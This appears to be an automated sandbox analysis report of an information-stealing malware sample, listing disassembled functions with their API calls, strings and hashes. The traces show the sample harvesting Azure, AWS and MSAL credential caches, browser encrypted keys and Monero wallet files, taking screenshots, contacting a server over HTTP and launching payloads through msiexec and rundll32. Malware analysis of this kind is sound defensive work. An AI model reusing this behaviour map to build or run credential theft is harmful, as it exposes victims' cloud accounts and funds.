                              • Opcode ID: 516a9b1dd8fa8f0a3f3b846def0ff66f60e540c792853b0b75043c986fd078eb
                              • Instruction ID: 61a6fe8c49f00a288ffa2026af6482bd4aad4144a44a861e2539cb040f4950b3
                              • Opcode Fuzzy Hash: 516a9b1dd8fa8f0a3f3b846def0ff66f60e540c792853b0b75043c986fd078eb
                              • Instruction Fuzzy Hash: E8E100B1D1010CABDB15EBA4DC91FFEB778AF54340F404169F20A67191DF706A4ACB66
                              Function 009F8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • RegOpenKeyExA.ADVAPI32(00000000,013BAE80,00000000,00020019,00000000,00A005B6), ref: 009F83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009F8426
                              • wsprintfA.USER32 ref: 009F8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009F847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 009F8499
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: f9a79cb459a20d0a46c678fc45887b90c4ff18051e6129b8e6a8a4da3bae2a2b
                              • Instruction ID: 3b89dc8f976cd70d079a09975570ec334bf8a116e178888384e4593a966788a4
                              • Opcode Fuzzy Hash: f9a79cb459a20d0a46c678fc45887b90c4ff18051e6129b8e6a8a4da3bae2a2b
                              • Instruction Fuzzy Hash: C2811BB191011CABDB64DB50CC95FEEB7B8FF48700F008699E209A6190DF756B86CFA5
                              Function 009F4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 009F4DCD
                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F492C
                                • Part of subcall function 009F4910: FindFirstFileA.KERNEL32(?,?), ref: 009F4943
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 009F4E59
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FDC), ref: 009F4971
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A00FE0), ref: 009F4987
                                • Part of subcall function 009F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 009F4B7D
                                • Part of subcall function 009F4910: FindClose.KERNEL32(000000FF), ref: 009F4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 009F4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 009F4EE5
                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F49B0
                                • Part of subcall function 009F4910: StrCmpCA.SHLWAPI(?,00A008D2), ref: 009F49C5
                                • Part of subcall function 009F4910: wsprintfA.USER32 ref: 009F49E2
                                • Part of subcall function 009F4910: PathMatchSpecA.SHLWAPI(?,?), ref: 009F4A1E
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,013BE3B0), ref: 009F4A4A
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,00A00FF8), ref: 009F4A5C
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,?), ref: 009F4A70
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,00A00FFC), ref: 009F4A82
                                • Part of subcall function 009F4910: lstrcat.KERNEL32(?,?), ref: 009F4A96
                                • Part of subcall function 009F4910: CopyFileA.KERNEL32(?,?,00000001), ref: 009F4AAC
                                • Part of subcall function 009F4910: DeleteFileA.KERNEL32(?), ref: 009F4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 89cd4dd3422abf7fbe03823d8bc76dd92fd56dafccdde84d0d53c982c6b8db80
                              • Instruction ID: 3832434724f6deba1cea961da9201b2a63002d8787f8308a730d63b679f13511
                              • Opcode Fuzzy Hash: 89cd4dd3422abf7fbe03823d8bc76dd92fd56dafccdde84d0d53c982c6b8db80
                              • Instruction Fuzzy Hash: 4C4156B995020C67DB64F770EC47FED7338ABA4700F404954B689660C1EEB59BC98B92
                              Function 009F9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009F906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: eb28a853da2ae3cfee70d031023914a35d540d6e732e314982b7576f99ed4d80
                              • Instruction ID: 6db553dca4f26b653f974fd99985b4e24f5cb39353d2bde5c01bea6d6534b762
                              • Opcode Fuzzy Hash: eb28a853da2ae3cfee70d031023914a35d540d6e732e314982b7576f99ed4d80
                              • Instruction Fuzzy Hash: B971DEB5A10208ABDB14DFE4DC89FEEB7B9BF88700F108518F615A7290DB74E945CB61
                              Function 009F2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 009F34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: f4cf8d57367adc6694490a5601e7840e1704e4d20b5b3b96857233a806cc478b
                              • Instruction ID: 7aca848ed6adebae1005873ee1b485c1b2d8daafda0eb5f68225dff6e360a1d4
                              • Opcode Fuzzy Hash: f4cf8d57367adc6694490a5601e7840e1704e4d20b5b3b96857233a806cc478b
                              • Instruction Fuzzy Hash: 4D1222B181010CAADB15FB90DC52FFE7778AF94340F508169F60A66091EF746B4ACF56
                              Function 009F52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E6280: InternetOpenA.WININET(00A00DFE,00000001,00000000,00000000,00000000), ref: 009E62E1
                                • Part of subcall function 009E6280: StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6303
                                • Part of subcall function 009E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E6335
                                • Part of subcall function 009E6280: HttpOpenRequestA.WININET(00000000,GET,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E6385
                                • Part of subcall function 009E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009E63BF
                                • Part of subcall function 009E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009E63D1
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009F5318
                              • lstrlen.KERNEL32(00000000), ref: 009F532F
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 009F5364
                              • lstrlen.KERNEL32(00000000), ref: 009F5383
                              • lstrlen.KERNEL32(00000000), ref: 009F53AE
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 8d2ccd09364127311ca4d87bf49f6462eb8f8a951846b91a3663b58d846a6c6f
                              • Instruction ID: 108223c1361e5e440a80774aa244e753b35866dc7f86b52efba75f4943a83194
                              • Opcode Fuzzy Hash: 8d2ccd09364127311ca4d87bf49f6462eb8f8a951846b91a3663b58d846a6c6f
                              • Instruction Fuzzy Hash: A2510DB091014CABCB14FF60CD92BFD7779AF90340F508418FA0A5A591EF74AB46CB66
                              Function 009F12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: d000db84e8818227f26fef68610d3e02d3f2bc346127763a7ddec50bdec6fa85
                              • Instruction ID: d53c61c2c61ddd334d5a689cc18a1dd032a1d0270440c622a805d0e3bd1a2222
                              • Opcode Fuzzy Hash: d000db84e8818227f26fef68610d3e02d3f2bc346127763a7ddec50bdec6fa85
                              • Instruction Fuzzy Hash: B0C161B590021D9BCB14EF60DC89FFE7379BB94304F104598F60AA7281EA75EA85CF91
                              Function 009F4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 009F42EC
                              • lstrcat.KERNEL32(?,013BDA10), ref: 009F430B
                              • lstrcat.KERNEL32(?,?), ref: 009F431F
                              • lstrcat.KERNEL32(?,013BC9B8), ref: 009F4333
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009F8D90: GetFileAttributesA.KERNEL32(00000000,?,009E1B54,?,?,00A0564C,?,?,00A00E1F), ref: 009F8D9F
                                • Part of subcall function 009E9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009E9D39
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                                • Part of subcall function 009F93C0: GlobalAlloc.KERNEL32(00000000,009F43DD,009F43DD), ref: 009F93D3
                              • StrStrA.SHLWAPI(?,013BD9F8), ref: 009F43F3
                              • GlobalFree.KERNEL32(?), ref: 009F4512
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9AEF
                                • Part of subcall function 009E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009E4EEE,00000000,?), ref: 009E9B01
                                • Part of subcall function 009E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009E4EEE,00000000,00000000), ref: 009E9B2A
                                • Part of subcall function 009E9AC0: LocalFree.KERNEL32(?,?,?,?,009E4EEE,00000000,?), ref: 009E9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 009F44A3
                              • StrCmpCA.SHLWAPI(?,00A008D1), ref: 009F44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 009F44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 009F44E5
                              • lstrcat.KERNEL32(00000000,00A00FB8), ref: 009F44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 1797096e061fe5bcca34c2fe407b8ca0cae8004d1ccbb365c195e1a808be948e
                              • Instruction ID: 3cb6f1f1a1d86432ac610508371400f952b19025a1fe819d96e00e0790947d97
                              • Opcode Fuzzy Hash: 1797096e061fe5bcca34c2fe407b8ca0cae8004d1ccbb365c195e1a808be948e
                              • Instruction Fuzzy Hash: ED7114B691020CABDB14FBA4DC85FEE737DBB88300F044598F609A7181EA75DB59CB91
                              Function 009E1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009E12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009E12B4
                                • Part of subcall function 009E12A0: RtlAllocateHeap.NTDLL(00000000), ref: 009E12BB
                                • Part of subcall function 009E12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009E12D7
                                • Part of subcall function 009E12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009E12F5
                                • Part of subcall function 009E12A0: RegCloseKey.ADVAPI32(?), ref: 009E12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 009E134F
                              • lstrlen.KERNEL32(?), ref: 009E135C
                              • lstrcat.KERNEL32(?,.keys), ref: 009E1377
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 009E1465
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 009E14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
